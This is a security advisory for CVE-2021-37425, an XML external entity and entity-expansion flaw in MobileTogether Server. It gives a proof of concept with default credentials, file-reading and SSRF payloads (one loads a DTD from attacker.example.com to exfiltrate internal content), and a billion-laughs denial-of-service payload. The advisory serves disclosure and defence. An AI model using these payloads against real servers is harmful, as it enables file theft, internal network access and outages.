RedTeam Pentesting discovered a vulnerability in the
MobileTogether
server which allows users with access to at least one app to
read
arbitrary, non-binary files from the file system and perform
server-side
requests. The vulnerability can also be used to deny availability
of the
system. As an example, this advisory shows the compromise of
the
server's certificate and private key.
Details
=======
Product: MobileTogether Server
Affected Versions: 7.0-7.3, potentially earlier versions as
well
Fixed Versions: 7.3 SP1
Vulnerability Type: XML External and Exponential Entity
Expansion
Security Risk: medium
Vendor URL: https://www.altova.com/mobiletogether-server
Vendor Status: fixed version released
Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
Advisory Status: published
CVE: CVE-2021-37425
CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
Introduction
============
"MobileTogether Server is the processing powerhouse for your
native iOS,
Android, Windows, and browser-based apps.
MobileTogether Server is the back-end hub for your solutions and
acts as
a gateway between end-users and your back-end data sources and
infrastructure."
(from the vendor's homepage)
More Details
============
MobileTogether Server is a back-end application hosting
developed apps
and provide access to various platforms and devices. Access to
these
apps is possible via native applications for devices and
operating
systems or directly via the browser. To access the
MobileTogether
server, depending on configuration either an anonymous login is
possible
or credentials are required.
During analysis of the communication between a MobileTogether
client
application on a smartphone and the MobileTogether Server, HTTP
requests
were observed containing JSON as well as XML data. Generally, the
XML
data is used to signal changes in the UI or user-supplied input for
the
app hosted in MobileTogether Server.
It was found that user-supplied XML external entities included
in the
described HTTP requests are resolved by the MobileTogether Server
and
the result is reflected in an HTTP response.
This behaviour allows to read local files, perform server-side
requests
and also deny the availability of the service through XML
exponential
entity expansion. However, file disclosure is limited to
non-binary
files and the absolute path needs to be known in advance.
Proof of Concept
================
MobileTogether Server comes with a series of example
applications. To
exploit the vulnerability, access to at least one application
is
required. In the following, the app EuroFXrates and the default
user
root with the default password root is used for demonstration of
the
vulnerability.
The following HTTP request contains the minimal data required to
be
accepted by the server resulting in the processing of the XML
data
stored within the JSON field InfoSetChanges/Changes (formatted
for
better readability):
------------------------------------------------------------------------
POST /workflowmanagement HTTP/1.1
Authorization: Basic cm9vdDpyb290
Content-Type: application/json
Content-Length: 851
Host: 192.168.1.1:8085
Connection: close
{
"DeviceY": 0,
"ClientVersionName": "7.2.2",
"MobileManufacturer": "",
"AllInfosetsSerialized": true,
"ServerName": "192.168.1.1",
"ProtocolVersionMax": "2",
"Language": "en-US",
"DeviceType": "",
"ClientKey": "1_11148009037086584903_2744738433663963458",
"DeviceXDPI": 0,
"DeviceYDPI": 0,
"DeviceYCanvasWithTabs": 0,
"ClientArchiveVersionUUID":
"{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
"ProtocolVersionMin": "2",
"DeviceXCanvas": 0,
"ClientArchiveVersionMin": "-74",
"MobileOSVersion": "Android 11",
"DeviceXCanvasWithTabs": 0,
"ClientArchiveVersionMax": "65",
"User": "root",
"DeviceX": 0,
"DesignFileName": "/public/EuroFXrates",
"EncValue": "M9EBc6-7P5cd0",
"DeviceYCanvas": 0,
"MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
"InfosetChanges": [
{
"Changes": [
{
"": "<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
<SkipIntro>false</SkipIntro>
</Root>"
}
],
"ID": "$$PERS$$"
}
],
"DeviceIsPortrait": true
}
------------------------------------------------------------------------
With the following XML data it can be verified that XML entities
are
resolved and reflected within predefined XML tags in the HTTP
response:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
<!ENTITY redteam "RedTeam Pentesting">
]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The HTTP response contains the resolved XML entity:
------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
<RedTeam>RedTeam Pentesting</RedTeam>
[...]
------------------------------------------------------------------------
The following example shows how local files can be read from the
server
system hosting the MobileTogether Server on a Windows system:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
<!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The content of the file is shown below and formatted for
better
readability:
------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
<RedTeam>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</RedTeam>
[...]
------------------------------------------------------------------------
One interesting target for attackers could be the configuration
file for
the MobileTogether Server residing at the following fixed
location:
------------------------------------------------------------------------
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
------------------------------------------------------------------------
For example, if the server supports HTTPS, the absolute path to
the
server's certificate and private key is stored in its
configuration.
Furthermore, external XML entities can be used to access
third-party
websites as well as web services that are only available
internally.
Together with an externally hosted XML DTD, response information
can be
extracted:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % content SYSTEM "http://internal.example.com">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml">
% dtd; ]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The DTD contains the following information:
------------------------------------------------------------------------
<!ENTITY redteam "%start;%content;%end;">
------------------------------------------------------------------------
In the HTTP response, the HTML markup delivered by
internal.example.com
is now visible.
A further vulnerability attacks the availability of the service
through
XML exponential entity expansion. This is demonstrated with the
following XML document:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY redteam0 "RedTeam Pentesting">
<!ENTITY redteam1 "&redteam0; &redteam0;">
<!ENTITY redteam2 "&redteam1; &redteam1;">
<!ENTITY redteam3 "&redteam2; &redteam2;">
<!ENTITY redteam4 "&redteam3; &redteam3;">
<!ENTITY redteam5 "&redteam4; &redteam4;">
<!ENTITY redteam6 "&redteam5; &redteam5;">
<!ENTITY redteam7 "&redteam6; &redteam6;">
<!ENTITY redteam8 "&redteam7; &redteam7;">
<!ENTITY redteam9 "&redteam8; &redteam8;">
<!ENTITY redteam10 "&redteam9; &redteam9;">
<!ENTITY redteam11 "&redteam10; &redteam10;">
<!ENTITY redteam12 "&redteam11; &redteam11;">
<!ENTITY redteam13 "&redteam12; &redteam12;">
<!ENTITY redteam14 "&redteam13; &redteam13;">
<!ENTITY redteam15 "&redteam14; &redteam14;">
<!ENTITY redteam16 "&redteam15; &redteam15;">
<!ENTITY redteam17 "&redteam16; &redteam16;">
<!ENTITY redteam18 "&redteam17; &redteam17;">
<!ENTITY redteam19 "&redteam18; &redteam18;">
<!ENTITY redteam20 "&redteam19; &redteam19;">
]>
<Root>
<RedTeam>&redteam20;</RedTeam>
</Root>
------------------------------------------------------------------------
Sending the shown XML document leads to a huge server-side
resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.
Workaround
==========
None known.
Fix
===
According to the vendor, upgrading to version 7.3 SP1 resolves
the
vulnerability.
Security Risk
=============
Attackers in possession of an account for a MobileTogether
Server with
access to at least one app are able to read files from the
server
system, conduct HTTP requests to external and internal systems and
can
also deny the availability of the service. Access might also be
possible
through default credentials or the anonymous user.
Timeline
========
2021-06-21 Vulnerability identified
2021-06-23 Requested a security contact from vendor
2021-06-25 Security contact established with vendor
2021-07-05 Customer approved disclosure to vendor
2021-07-05 Vendor notified
2021-07-20 Vendor acknowledged vulnerability
2021-07-22 CVE ID requested
2021-07-23 CVE ID assigned
2021-07-28 Vendor released fixed version
2021-08-10 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed
by a
team of specialised IT-security experts. Hereby, security
weaknesses in
company networks or products are uncovered and can be fixed
immediately.
As there are only few experts in this field, RedTeam Pentesting
wants to
share its knowledge and enhance the public knowledge with research
in
security-related areas. The results are made available as
public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join
our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
